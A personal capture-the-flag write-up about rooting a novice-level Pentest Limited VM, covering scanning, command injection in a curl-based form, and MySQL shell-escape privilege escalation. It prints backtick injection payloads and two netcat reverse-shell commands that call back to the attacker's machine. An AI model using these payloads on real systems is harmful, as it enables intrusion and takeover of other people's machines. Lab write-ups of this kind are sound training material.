Pentest Limited's SecuriCTF Write up

From time to time, I have time to look at and try some CTF (Capture the Flag) VMs to try to get root on. These are purpose built VMs to challenge people to break in. For the Securi-Tay 2017 conference, Pentest Limited released a CTF VM, and even though the solution was posted I decided to give it a go to see how I faired. The VM was aimed at the novice level, so I was in with a chance.
Once the VM was booted in virtualbox, I was presented with the IP address of the VM from inside the console screen. In this case my target was 192.168.56.101. My attacking machine (Kali Linux) was sitting on 192.168.56.1. As this is my virtualbox network, I knew that there shouldn't be anything else on the LAN, so I did a ping sweep to confirm, using nmap. The nmap command is
nmap -sP 192.168.56.1/24
Once happy there were no more IP Addresses, I proceeded with the NMAP scan of the host, starting with TCP. Once complete I was presented with the following output:
# nmap -p1-65535 -sT 192.168.56.101
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-11 09:59 BST
Nmap scan report for 192.168.56.101
Host is up (0.019s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:82:1A:4C (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.73 seconds
Well, a web server is a pretty good place to start on most CTF VMs that I have come across, so I opened up my web browser, and was greeted with this page:

So a simple text box looked interesting. The first thing I did was to push the button to see what would happen. When I did, this screen was displayed:

From the response, the actions taken appeared to be run curl to download a page, and then display the page. So, if it's running a command, can I inject a command?

My first pass of just trying a valid url + ; id ; failed. Time to fall back to my normal position of enumeration. For this I fired up Dirbuster, and pointed it at the web server. While waiting for this to finish, I started a simple web server in python, and pointed it to a directory which I had set up for this particular exercise. The command I ran was just:
python -m SimpleHTTPServer
When I place http://192.168.56.1:8000 (the attackers IP + default port for the python web server) in to the search bar, I was greeted with the directory listing from my machine. I next tried it with a crafted image I had from a different challenge which was both an image and a PHP script. Unfortunately, only the image displayed. I had also forgotten to check if the web server runs PHP!
My next step was to then fire up nikto and run that against the web server. My findings were:
# nikto -host 192.168.56.101 -C all
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2017-05-11 10:47:31 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user $
+ The X-Content-Type-Options header is not set. This could allow the user agent$
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apa$
+ Web Server returns a valid response with junk HTTP methods, this may cause fa$
+ Server leaks inodes via ETags, header found with file /test.html, fields: 0xe$
+ OSVDB-3092: /test.html: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 26168 requests: 2 error(s) and 8 item(s) reported on remote host
+ End Time: 2017-05-11 11:15:51 (GMT1) (1700 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Again, no indication of PHP, or any other scripting language on the web server. I know there must be one, due to the action performed, unless it is using cgi to do the processing. While I pondered this, Dirbuster had finished:

So, a clear indication PHP is in use on the index page. Also, an uploads directory. Nothing to indicate how the files actually got in to that directory, how ever. Since I was now unsure how to proceed, I actually decided to try a new tool, which I had never used before. The tool is called Arachni. Running Arachni against the web server was quite simple, just:
# arachni http://192.168.56.101
Arachni produced a lot of information in afr format, which need to be converted to html for me to sift through. Upon examination, I found that arachni had found the command injection I was looking at earlier, but had more success with running commands. Arachni suggested using back ticks. After changing the url in the text box to be
http://localhost/test.html ` id `
I was greeted with www-data on the screen. This was consistent with the web user from a Debian machine. Starting up a netcat session on my attacker on port 8888 and set the text box to read:
http://localhost/test.html ` netcat 192.168.56.1 8888 -e /bin/sh `
My netcat shell then indicated I had a prompt, and I tried a few things out:
# netcat -l -v -p 8888
Listening on [0.0.0.0] (family 0, port 8888)
Connection from 192.168.56.101 40745 received!
whoami
www-data
pwd
/var/www/html
uname -a
Linux ctf 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64 GNU/Linux
ls /home/
ctfuser
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nolog$
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/fa$
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin$
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
ctfuser:x:1000:1000:ctfuser,,,:/home/ctfuser:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN 5377/netcat
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 192.168.56.101:40745 192.168.56.1:8888 ESTABLISHED 5499/sh
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 1 0 192.168.56.101:80 192.168.56.1:55442 CLOSE_WAIT -
tcp6 1 0 192.168.56.101:80 192.168.56.1:55408 CLOSE_WAIT -
So, 2 internal services which don't appear to the outside world. At first glance, these appear to be a mail server (TCP port 25) and MySQL (TCP port 3306). Before proceeding I took a look at the web server directory, and found that uploads was writable by the web server. I downloaded a laudanum PHP web shell in the directory for a extra helping hand.
I then examined the index.PHP page, to see if there were anything useful in there, but other than the validation rules to try to stop command injections and the confirmation of my suspicion of curl being run, nothing else was gained by the inspection. However the lack of a mysql connection string was interesting. This could be a sign of the database being a legacy service, rather than in use. Legacy might mean interesting.
Enumerating locally, I found that the mail server was Exim (specifically EXIM 4.84_2) just by connecting to the port via telnet. Searching through the exploit-db, the only exploit I can find requires Perl to be loaded, and to be Debian-exim. Neither of which is me, so I note it down and move on.
In the ctfuser's home directory, I notice the file mydbconnchecker. I run the command, and it appears to connect to the database as root and check the status of the database. Examining the file using:
strings -a ./mydbconnchecker
I find this which looks interesting:
exampleprog
Program started by User %d
===Connecting to database:mysql on 127.0.0.1:root:rorschach===
show tables
MySQL Tables in mysql database:
Running the commands
bash 2>&1
python -c 'import pty; pty.spawn("/bin/sh")'
mysql -u root -prorschach
does let me in to the mysql database as root. Good, but not the actual system root. With not finding anything interesting initially, I note the root login and drop back to the shell and enumerate further. Enumerating the kernel appears to indicate that it is vulnerable to the dirtycow vulnerability. After trying, I confirm that it actually doesn't appear to be. Enumerating the running processes does reveal that mysql is running as root, rather than the default mysql.
I logged back in to mysql and tried a few exploits. The first one, the raptor udf, was foiled by the secure auth files attribute, as well as I was trying to write to directories I was not allowed to. Similar story for the log file not allowing writing to /etc/mysql/my.cnf.
At this point I was stuck. I reached out to a friend who gave me the advice to examine the mysql server further. So I started googling the words "mysql root shell" and eventually came across a shell break out for mysql. I had seen this in plenty of other applications (such as vi or asterisk) but not in mysql. I started another netcat listener (this time on port 8889) and ran the following on the mysql server:
\! netcat 192.168.56.1 8889 - e '/bin/sh';
The netcat listener gave the output:
# netcat -lvp 8889
Listening on [0.0.0.0] (family 0, port 8889)
Connection from 192.168.56.101 46229 received!
whoami
root
pwd
/var/www/html
Yay! I was root. I changed directory to /root/ and performed an ls:
# ls -l
ls -l
total 16
-r-x------ 1 root root 8096 Feb 24 21:32 flag-gen
---------- 1 root root 285 Feb 2 15:18 flag.txt
---------- 1 root root 451 Feb 2 13:43 public_key.pem
Time to look at the flag.txt file:
# cat flag.txt
cat flag.txt
Please run the flag-gen binary in the /root/ folder to generate your unique flag. If you have got this far and are interested doing this sort of thing for a living, send an email to careers@pentest.co.uk with your unique flag, a description of how you found it and your CV. Well Done!
So Running flag-gen gave:
# ./flag-gen
./flag-gen
Please supply your name as an argument.
And running the command properly gave:
# ./flag-gen "Tim Wilkes"
./flag-gen "Tim Wilkes"
AMDesf9FBX1ZSKZSKknSbS1xOG92QNVilrW5NMtQC2QjVKlBW7ch8Pdr+TeRXsfwzFnV3Pl9hJzY
fNziVIZqa0bKfsfWWGrUIVRgwKWCcckWUvK5oq+JxE03w1VFoYsHCpCVkcJ8yTxxC+GEGVsgiHq+
lQoB/SqLTuXbRThPswE1hErC98vkiz73OybHxFU1cU2qSvQAzjA0BshMfMertsjRWn0h/TPaJHm2
uo9O2xtgknVFNef7toj+jLB7XNCDqZJlrsoR1WA7+VV96MDUb0m8qj3IPrfi3eqwhJc+tV71EusW
Sv7Zy8EYavnAAQ+sHCbLrnSkZs8JQWcMNoBulQ==
In conclusion, this was a fun challenge and I got to learn more about arachni, and something new about mysql. I also have noted that Pentest have another VM, this time at a higher level, which I may well have a got at.